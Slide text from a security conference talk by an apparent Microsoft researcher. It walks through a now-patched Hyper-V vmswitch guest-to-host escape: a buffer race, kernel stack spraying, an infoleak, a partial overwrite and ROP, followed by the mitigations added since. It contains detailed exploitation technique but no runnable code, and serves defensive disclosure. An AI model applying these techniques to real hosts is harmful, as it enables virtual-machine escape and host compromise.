BlueHat v18 || Hardening hyper-v through offensive security research

Hardening Hyper-V through
offensive security research
Jordan Rabet, Microsoft OSR
Live demo!
Note: all vulnerabilities mentioned in this talk have been addressed

Hardware
Guest OSHost OS
Kernel modeKernel mode
User modeUser mode
vmbus
Storage Physical memoryNetwork card
Hyper-V architecture: layout
CPUs …
Hypercalls Address manager MSRs …
4
Hypervisor

storVSC
storVSP
I/O stack
foo.exe
I/O stack
Hyper-V architecture: accessing hardware resources from Guest OS
CPUs …
5
vmbus
User modeUser mode
Hardware
Guest OSHost OS
Hypervisor

vmbus internals: small packet
Physical addresses
(PA)
Guest Virtual
Addresses
(GVA)
Guest Physical
Addresses
(GPA)
System Virtual
Addresses
(SVA)
6
Kernel modeKernel mode Guest OSHost OS
Physical memory
Host physical
memory
Guest physical
memory
Shared virtual ringbufferShared virtual ringbuffer
System Physical
Addresses
(SPA)
VSC
vmbusvmbusr
VSP
Packet
Packet
Packet
Packet
Packet

vmbus internals: small packet passing a direct mapping (GPADL)
Packet PacketGPADL GPADL
Physical addresses
(PA)
Guest Virtual
Addresses
(GVA)
Guest Physical
Addresses
(GPA)
System Virtual
Addresses
(SVA)
7
Kernel modeKernel mode Guest OSHost OS
Physical memory
Host physical
memory
Guest physical
memory
Shared virtual ringbufferShared virtual ringbuffer
System Physical
Addresses
(SPA)

netVSC
vmswitch
I/O stack
I/O stack
vmswitch: virtualized network provider
vmswitch is a VSP,
lives in host kernel
netVSC tunnels
traffic over to
vmswitch
CPUs …
9
vmbus
User modeUser mode
foo.exe
Hardware
Guest OSHost OS
Hypervisor
vmswitch emulates a
network card through
the RNDIS protocol

Guest OSHost OS Kernel modeKernel mode
Host physical
memory
Guest physical
memory
Physical memory
Receive BufferSend BufferReceive Buffer Send Buffer
vmbus messages
10
vmswitch: initialization sequence

Receive buffer Send buffer
vmbus messages
…
netVSC
RNDIS
CMPLT
RNDIS
QUERY
11
vmswitch
vmswitch: sending RNDIS packets

Host OSKernel mode
vmswitch: how are RNDIS messages handled?
vmbus channel
RNDIS
SET
RNDIS MSG
queue
RNDIS worker thread 1
Channel
thread
RNDIS
CMPLT
RNDIS
CMPLT
vmswitch
12
RNDIS
QUERY
RNDIS
QUERY
RNDIS
CMPLT
RNDIS
SET
RNDIS
SET
RNDIS
CMPLT
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS
QUERY

Initialization sequence vulnerability

Host physical
memory
Guest physical
memory
Physical memory
Messing with the initialization sequence
Receive Buffer Pointer
GPADL 0 GPADL 1 GPADL 2GPADL 0 GPADL 1 GPADL 2
14

vmswitch receive buffer update
Receive buffer update isn’t atomic
1. Updates the pointer to the buffer
2. Generates and updates sub-allocations
No locking on the receive buffer
• It could be used in parallel
Update pointer to receive buffer
1
15
Generate bounds of sub-allocations
2
Update bounds of sub-allocations
3

Host OSKernel mode
GPADL 0
vmswitch vmbus channel
GPADL 1
Receive Buffer Pointer
16
1
2
3

• During this short window, we can have
out-of-bound sub-allocations
• This results in a useful out-of-bounds
write if:
1. We can control the data being written
2. We can win the race
3. We can place a corruption target
adjacent to the receive buffer
Receive buffer race condition
GPADL 1
17
1
2
3

Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target
?
?
?

Controlling the OOB write contents
• OOB write contents: RNDIS control message responses
• RNDIS_QUERY_MSG messages can return large buffers of data
20
Offset Size Field
0 4 MessageType
4 4 MessageLength
8 4 RequestId
12 4 Status
16 4 InformationBufferLength
20 4 InformationBufferOffset

Winning the race
?
?

Host OSKernel mode
vmswitch: handling RNDIS messages is asynchronous, but not really
vmbus channel
RNDIS MSG
queue
RNDIS
MSG 0
CMPLT
vmswitch
RNDIS
MSG 0
RNDIS
MSG 1
RNDIS
MSG 2
RNDIS
MSG 0
RNDIS
MSG 1
CMPLT
RNDIS
MSG 1
Waiting on MSG 0
ack from guest
Waiting on MSG 1
ack from guest
22
Channel
thread

Winning the race: delaying one RNDIS message?
• Can’t have RNDIS messages continuously write to the receive buffer
• But we don’t need continuous RNDIS messages – we just need one
• Can we send an RNDIS message and have it be processed in a delayed way?
• No by-design way of delaying RNDIS messages…
• …but not all messages require an ack from the guest
• Example: malformed RNDIS_KEEPALIVE_MSG message
• Idea: “cascade of failure”
• Block off all RNDIS worker threads
• Chain N malformed RNDIS_KEEPALIVE_MSG messages
• Append a single valid RNDIS message
23

Kernel mode
The Cascade Of Failure: making the host race itself
vmbus channel
RNDIS MSG
queue
RNDIS
MSG 0
CMPLT
vmswitch
RNDIS
MSG 0
RNDIS
MSG 1
CMPLT
RNDIS
MSG 1
Waiting on MSG 0
ack from guest
RNDIS
MSG 4
RNDIS
MSG 5
RNDIS
MSG 6
RNDIS
MSG 7
RNDIS
MSG 3
Host OS
RNDIS
MSG 8
CMPLT
RNDIS
MSG 8
Written to the receive buffer
after a controlled delay
Waiting on MSG 1
ack from guest
24
Channel
thread

Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• If so we could search for the right N
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
25

GPADL 0
Too early
Too late
Just right
RNDIS
CMPLT
26
GPADL 1
RNDIS
CMPLT
GPADL 1
RNDIS
CMPLT
1
3

Winning the race
Finding a reliable corruption target?

Finding a target: other GPADL/MDLs and… stacks
0: kd> !address
...
ffffdd80`273bb000 ffffdd80`273c1000 0`00006000 SystemRange Stack Thread: ffffc903f188b080
ffffdd80`273c1000 ffffdd80`273c6000 0`00005000 SystemRange
ffffdd80`273c6000 ffffdd80`273cc000 0`00006000 SystemRange Stack Thread: ffffc903eed10800
ffffdd80`273cc000 ffffdd80`273cf000 0`00003000 SystemRange
ffffdd80`273cf000 ffffdd80`273d5000 0`00006000 SystemRange Stack Thread: ffffc903f182b080
ffffdd80`273d5000 ffffdd80`27606000 0`00231000 SystemRange
ffffdd80`27606000 ffffdd80`2760c000 0`00006000 SystemRange Stack Thread: ffffc903f181f080
ffffdd80`2760c000 ffffdd80`2760d000 0`00001000 SystemRange
ffffdd80`2760d000 ffffdd80`27613000 0`00006000 SystemRange Stack Thread: ffffc903ee878080
ffffdd80`27613000 ffffdd80`27625000 0`00012000 SystemRange
ffffdd80`27625000 ffffdd80`2762b000 0`00006000 SystemRange Stack Thread: ffffc903ee981080
ffffdd80`2762b000 ffffdd80`2762c000 0`00001000 SystemRange
ffffdd80`2762c000 ffffdd80`27632000 0`00006000 SystemRange Stack Thread: ffffc903f1bc64c0
...
28

Finding a target: kernel stacks
• Windows kernel stacks
• Fixed 7 page allocation size
• 6 pages of stack space
• 1 guard page at the bottom
• Allocated in the SystemPTE region
• Great corruption target if within range – gives instant ROP
• Problems
• How does the SystemPTE region allocator work?
• Can we reliably place a stack at a known offset from our receive buffer?
• Can we even “place” a stack? How do we spawn threads?
29

Allocation bitmap
• Bitmap based
• Each bit represents a page
• Bit 0 means free page, 1 means allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
SystemPTE allocator
Free page
Allocated page
Bitmap hint
30

Allocation bitmap
• Bitmap based
• Example 1: allocating 5 pages
SystemPTE allocator
Free page
Allocated page
Bitmap hint
31

Allocation bitmap
• Bitmap based
• Example 2: allocating 5 pages again
SystemPTE allocator
Free page
Allocated page
Bitmap hint
32

Allocation bitmap
• Bitmap based
• Example 2: allocating 5 pages again
SystemPTE allocator
Free page
Allocated page
Bitmap hint
33

SystemPTE massaging: allocation primitives
• Receive/send buffers: can map any number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Some vmswitch messages use System Worker Threads
• NT-maintained thread pool
• More threads added to the pool when others are busy
• Idea: trigger many async tasks quickly in a row
• If enough are queued, more threads are spawned
• Helper: deadlock bug in async task lets us lock existing worker threads
• As a result: we can spray a handful of kernel stacks
34

Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
Two possible outcomes, both manageable
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
35

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #1
36

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #1
37

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #1
38

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #1
39

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Replaceable receive
buffer
Thread
stack
Outcome #1
40

Winning the race
Bypassing KASLR?

nvsp_message struct
• Represents messages sent to/from vmswitch over vmbus
43
struct nvsp_message {
struct nvsp_message_header hdr;
union nvsp_all_messages msg;
} __packed;

44
NVSP_MSG1_TYPE_SEND_
RNDIS_PKT_COMPLETE
NVSP_MSG1_TYPE_SEND_
NDIS_VER
UINT32 hdr.msg_type
UINT32 ndis_major_ver
UINT32 ndis_minor_ver
UINT32 hdr.msg_type
UINT32 status
sizeof(nvsp_message)
UINT32 hdr.msg_type
UINT32 ndis_major_ver
UINT32 ndis_minor_ver
UINT32 hdr.msg_type
UINT32 status
msg.send_ndis_ver msg.send_rndis_pkt_complete

nvsp_message
Infoleak UINT32 MessagetypeUINT32 hdr.msg_type
UINT32 status
32 uninitialized
stack bytes
45
• nvsp_message is allocated on the stack
• Only the first 8 bytes are initialized
• sizeof(nvsp_message) is returned
 32 bytes of uninitialized stack memory
are sent back to guest
 can leak a vmswitch return address
 we have enough to build a ROP chain
and overwrite a kernel thread stack!

Bypassing KASLR without an infoleak
• Our infoleak applied to Windows Server 2012 R2, but not Windows 10
• Oops
• How do we deal with KASLR without an infoleak?
• KASLR only aligns most modules up to a 0x10000 byte boundary
• As a result, partial overwrites are an option
• Example:
• Return address is: 0xfffff808e059f3be (RndisDevHostDeviceCompleteSetEx+0x10a)
• Corrupt it to: 0xfffff808e04b8705 (ROP gadget: pop r15; ret;)
• Can only do a single partial overwrite though… is that useful?
• Only one partial overwrite because our OOB write is contiguous
46

SystemPTE massaging
Free page
Allocated page
Replaceable receive
buffer
SystemPTE massaging
Thread
stack
Send buffer immediately
after target stack
47

Partial overwrite
• What if we use it to get RSP into our send
buffer?
• Target return address: 0xFFFFF808E059F3BE
• We corrupt it to: 0xFFFFF808E059DA32
• We end up doing RSP += 0xE78
• This moves RSP into our send buffer…
… which is shared with the guest
lea r11, [rsp+0E50h]
mov rbx, [r11+38h]
mov rbp, [r11+40h]
mov rsp, r11
...
ret
RSP
... …
FFFFC500F5FFF700 …
FFFFC500F5FFF800 0xFFFFF808E059DA32
FFFFC500F5FFFA00 …
FFFFC500F5FFFB00 …
FFFFC500F5FFFC00 …
FFFFC500F5FFFD00 …
FFFFC500F5FFFE00 …
FFFFC500F5FFFF00 …
FFFFC500F6000000 00 00 00 00 00 00 00 00
FFFFC500F6000100 00 00 00 00 00 00 00 00
FFFFC500F6000200 00 00 00 00 00 00 00 00
FFFFC500F6000300 00 00 00 00 00 00 00 00
FFFFC500F6000400 00 00 00 00 00 00 00 00
FFFFC500F6000500 00 00 00 00 00 00 00 00
FFFFC500F6000600 00 00 00 00 00 00 00 00
FFFFC500F6000700 00 00 00 00 00 00 00 00
FFFFC500F6000800 00 00 00 00 00 00 00 00
FFFFC500F6000900
...
00 00 00 00 00 00 00 00
…
... …
FFFFC500F5FFF800 0xFFFFF808E059F3BE
FFFFC500F5FFFA00 …
FFFFC500F5FFFB00 …
FFFFC500F5FFFC00 …
FFFFC500F5FFFD00 …
FFFFC500F5FFFE00 …
FFFFC500F5FFFF00 …
FFFFC500F6000000 00 00 00 00 00 00 00 00
FFFFC500F6000100 00 00 00 00 00 00 00 00
FFFFC500F6000200 00 00 00 00 00 00 00 00
FFFFC500F6000300 00 00 00 00 00 00 00 00
FFFFC500F6000400 00 00 00 00 00 00 00 00
FFFFC500F6000500 00 00 00 00 00 00 00 00
FFFFC500F6000600 00 00 00 00 00 00 00 00
FFFFC500F6000700 00 00 00 00 00 00 00 00
FFFFC500F6000800 00 00 00 00 00 00 00 00
FFFFC500F6000900
...
00 00 00 00 00 00 00 00
…
48
Kernel thread
stack
Shared buffer

Host kernel stack in shared memory: what now?
1. The host CPU core throws a General Protection Fault (GPF)
• No KASLR bypass means the RET instruction will necessarily cause a fault
2. The address where the GPF happened is dumped to the stack
• In shared memory! We can read it, and that’s our KASLR bypass
3. Windows executes its GPF handler, still with the stack in shared memory
4. As attackers, we can:
1. Locate valid ROP gadget thanks to addresses being dumped to the stack
2. Manipulate the stack as the exception handler is being executed
• Includes exception records and of course other return addresses
5. As a result, we get ROP execution in host ☺
49

Vulnerability discovery
Exploitation
Post-exploitation
Breaking the chain
1
2
3
Targeted, continuous
internal code review
effort
Break exploit
techniques
Make components less
attractive targets,
invest in detection

Hardening: kernel stack isolation
To prevent overflowing into kernel stacks, we’ve moved them to their own region
0: kd> !address
...
ffffae8f`050a8000 ffffae8f`050a9000 0`00001000 SystemRange
ffffae8f`050a9000 ffffae8f`050b0000 0`00007000 SystemRange Stack Thread: ffffbc8934d51700
ffffae8f`050b0000 ffffae8f`050b1000 0`00001000 SystemRange
ffffae8f`050b1000 ffffae8f`050b8000 0`00007000 SystemRange Stack Thread: ffffbc8934d55700
ffffae8f`050b8000 ffffae8f`050b9000 0`00001000 SystemRange
ffffae8f`050b9000 ffffae8f`050c0000 0`00007000 SystemRange Stack Thread: ffffbc8934d59700
ffffae8f`050c0000 ffffae8f`050c1000 0`00001000 SystemRange
ffffae8f`050c1000 ffffae8f`050c8000 0`00007000 SystemRange Stack Thread: ffffbc8934d5d700
...
53

Hardening: other kernel mitigations
• Hypervisor-enforced Code Integrity (HVCI)
• Attackers can’t inject arbitrary code into Host kernel
• Kernel-mode Control Flow Guard (KCFG)
• Attackers can’t achieve kernel ROP by hijacking function pointers
• Work is being done to enable these features by default
• Future hardware security features: CET
• Hardware shadow stacks to protect return addresses and prevent ROP
54

VMWP.exe
VSMB
I/O stack
Hyper-V architecture: virtualization providers can be in user-mode
CPUs …
55
vmbus
User modeUser mode
Hardware
Guest OSHost OS
Hypervisor
I/O stack
foo.exe

Hardening: VM Worker Process
• Improved sandbox
• Removed SeImpersonatePrivilege
• Improved RCE mitigations
• Enabled CFG export suppression
• Large reduction in number of valid CFG targets
• Enabled “Force CFG”
• Only CFG-enabled modules modules can be loaded into VMWP
• Several Hyper-V components being put in VMWP rather than kernel
56

The Hyper-V bounty program
• Up to $250,000 payout
• Looking for code execution, infoleaks and denial of service issues
• https://technet.microsoft.com/en-us/mt784431.aspx
• Getting started
• Joe Bialek and Nicolas Joly’s talk: “A Dive in to Hyper-V Architecture &
Vulnerabilities”
• Hyper-V Linux integration services
• Open source, well-commented code available on Github
• Good way to understand VSP interfaces and experiment!
• Public symbols for some Hyper-V components
57

Thank you for your time
Special thanks to Matt Miller, David Weston, the Hyper-V team, the
vmswitch team, the MSRC team and all my OSR buddies
58

BlueHat v18 || Hardening hyper-v through offensive security research

User modeUser mode
VMWP.exe
VSMB
Hyper-V architecture: VMWP compromise
Malicious guest
Host technically
compromised, but
limited to VMWP
user-mode
CPUs …
61
vmbus
Hardware
Guest OSHost OS
Hypervisor

User modeUser mode
VMWP.exe
VSMB
Hyper-V architecture: VMWP to host kernel compromise
Malicious guest
Attacker escapes
user-mode through
local kernel, driver
exploit… NT
CPUs …
62
vmbus
Hardware
Guest OSHost OS
Hypervisor

User modeUser mode
VMWP.exe
VSMB
Hyper-V architecture: VMWP to host kernel compromise
Malicious guest
Attacker goes for
host kernel directly
through VSP surface storVSP
CPUs …
63
vmbus
Hardware
Guest OSHost OS
Hypervisor

User modeUser mode
VMWP.exe
VSMB
Hyper-V architecture: hypervisor compromise
Malicious guest
Attacker compromises
hypervisor, either
directly from guest or
through the host
CPUs …
64
vmbus
Hardware
Guest OSHost OS
Hypervisor

Host physical
memory
Guest physical
memory
Physical memory
vmswitch initialization: NVSP_MSG5_TYPE_SUBCHANNEL
Subchannel 1 vmbus buffer
Receive Buffer
Send Buffer
Receive Buffer
Send Buffer
vmswitch initialization: NVSP_MSG1_TYPE_SEND_SEND_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_RECV_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_NDIS_VERvmswitch initialization: NVSP_MSG_TYPE_INIT
vmbus messages
65

Host OSKernel mode
vmswitch: how are RNDIS messages handled?
vmbus channel
Channel
message batch
RNDIS
SET
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS MSG
queue
Channel
thread
RNDIS
CMPLT
RNDIS
CMPLT
vmswitch
66
RNDIS
QUERY
RNDIS
QUERY
RNDIS
CMPLT
RNDIS
SET
RNDIS
SET
RNDIS
CMPLT
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS
QUERY

vmswitch messages
None
Initializing
HaltedOperational
RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG
NVSP_MSG_TYPE_INIT
RNDIS_INITIALIZE_MSG
RNDIS_HALT_MSG
0
1
2 3
NVSP Message Type State # 0 1 2 3
NVSP_MSG_TYPE_INIT
NVSP_MSG1_TYPE_SEND_NDIS_VER
NVSP_MSG1_TYPE_SEND_RECV_BUF
NVSP_MSG1_TYPE_REVOKE_RECV_BUF
NVSP_MSG1_TYPE_SEND_SEND_BUF
NVSP_MSG1_TYPE_REVOKE_SEND_BUF
NVSP_MSG1_TYPE_SEND_RNDIS_PKT
NVSP_MSG5_TYPE_SUBCHANNEL
67
vmswitch state machine

vmswitch takeaways
• Send/receive buffers are used to transfer many messages at a time
• Opposite end needs to be prompted over vmbus to read from them
• vmswitch relies on different threads for different tasks
• vmbus dispatch threads
• Setup send/receive buffers, subchannels…
• Read RNDIS messages from send buffer
• The system worker threads
• Process RNDIS messages
• Write responses to receive buffer
• Subchannels only increase bandwidth in that they allow us to alert
the opposite end more often
68

None
Initializing
HaltedOperational
RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG
NVSP_MSG_TYPE_INIT
RNDIS_INITIALIZE_MSG
RNDIS_HALT_MSG
0
1
2 3
NVSP_MSG_TYPE_INIT
69

NVSP_MSG_TYPE_INIT
• Easy way to win the race: queue up RNDIS
messages and keep having them write to
receive buffer continuously
• Doesn’t work: RNDIS threads blocked until ack from guest
• Ack and buffer replacement happen on same channel:
can’t happen simultaneously…
• …unless we use subchannels!
• Multiple channels = simultaneity
• …but we can’t because of the state machine
Winning the race:
continuous writing?
0 1
2
3
70

Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• Yes
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
• In practice we usually converge to the right N in <10 attempts
• N can vary from machine to machine and session to session
71

Finding a target: where’s our buffer?
• GPADL mapping
• GPADL PAs mapped into an MDL using VmbChannelMapGpadl
• MDL then mapped to VA space using MmGetSystemAddressForMdlSafe
• Where are MDLs mapped to? The SystemPTE region
• What’s mapped adjacent to our MDL?
• ...other MDLs
0: kd> !address @@c++(ReceiveBuffer)
Usage:
Base Address: ffffdd80`273d5000
End Address: ffffdd80`27606000
Region Size: 00000000`00231000
VA Type: SystemRange
72

Finding a target: allocation primitives
• Receive/send buffers: we can map an arbitrary number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Receive/send buffers: can be revoked
• NVSP_MSG1_TYPE_REVOKE_RECV_BUF and NVSP_MSG1_TYPE_REVOKE_SEND_BUF
• Since replacing buffers is a bug, we can only revoke the last one sent for each
• We have pretty good allocation and freeing primitives for manipulating the region
• But we need a way to allocate new stacks if we want to target them…
• Can we spray host-side threads?
73

Finding a target: stack allocation primitives
• vmswitch relies on System Worker Threads to perform asynchronous tasks
• NT-maintained thread pool
• Additional threads are added to the pool when all others are busy
• Basic idea: trigger an asynchronous task many times in rapid succession
• If enough tasks are queued quickly enough, threads will be spawned
• Several vmswitch messages rely on System Worker Threads
• In this exploit we use NVSP_MSG2_TYPE_SEND_NDIS_CONFIG
• Problem
• This method usually lets us create about 5 threads
• What if there are already a lot of threads in the system worker pool?
• Would be nice to be able to terminate them…
74

Finding a target: stack allocation primitives
• There’s no by-design way to terminate worker threads from a guest
• But there are bugs we can use! ☺
• NVSP_MSG1_TYPE_REVOKE_SEND/RECV_BUF
• Revocation done on system worker threads
• Deadlock bug: when multiple revocation messages handled, all but the last
system worker thread would be deadlocked forever
• We can use this to lock out an “arbitrary” number of system worker
threads
• We now have a limited thread stack spray!
75

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #2
76

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #2
77

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #2
78

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Outcome #2
79

Allocation bitmap
5. Spray stacks
Free page
Allocated page
Bitmap hint
Replaceable receive
buffer
Thread
stack
Outcome #2
80

Finding a target: SystemPTE massaging
• After massaging, we know a stack is at one of two offsets from the receive buffer
• Either 3MB - 6 pages away or 4MB - 6 pages away
• Since we can perform the race reliably, we can just try both possible offsets
• Note: doing the race requires revoking and re-mapping the receive buffer
• We can do this because the SystemPTE bitmap will free our 2MB block and reuse it for next
2MB block allocation
• As a result, we’re almost guaranteed to fall back into the same slot if we’re fast enough
• We can overwrite a stack, but what do we write?
• Overwriting return addresses requires a host KASLR bypass
• Easiest way to do this: find an infoleak vulnerability
81

Putting it all together
• We can leak 32 bytes of host stack memory
• We can leak a vmswitch return address
• With a return address we can build a ROP chain ☺
• Final exploit:
• Use infoleak to locate vmswitch
• Use information to build a ROP chain
• We don’t know for sure which stack we’re corrupting, so we prepend a ROP NOP-sled
• (that just means a bunch of pointers to a RET instructions in a row)
• Perform host SystemPTE massaging
• Use race condition to overwrite host kernel thread stack with ROP chain
82

What about security? Host OS mitigations
• Full KASLR
• Kernel Control Flow Guard
• Optional
• Hypervisor-enforced code
integrity (HVCI)
• Optional
• No sandbox
Host OS kernel
• ASLR
• Control Flow Guard (CFG)
• Arbitrary Code Guard (ACG)
• Code Integrity Guard (CIG)
• Win32k lockdown
VM Worker Process
83

BlueHat v18 || Hardening hyper-v through offensive security research

More Related Content

What's hot (20)

Similar to BlueHat v18 || Hardening hyper-v through offensive security research (20)

More from BlueHat Security Conference (20)

Recently uploaded (20)

BlueHat v18 || Hardening hyper-v through offensive security research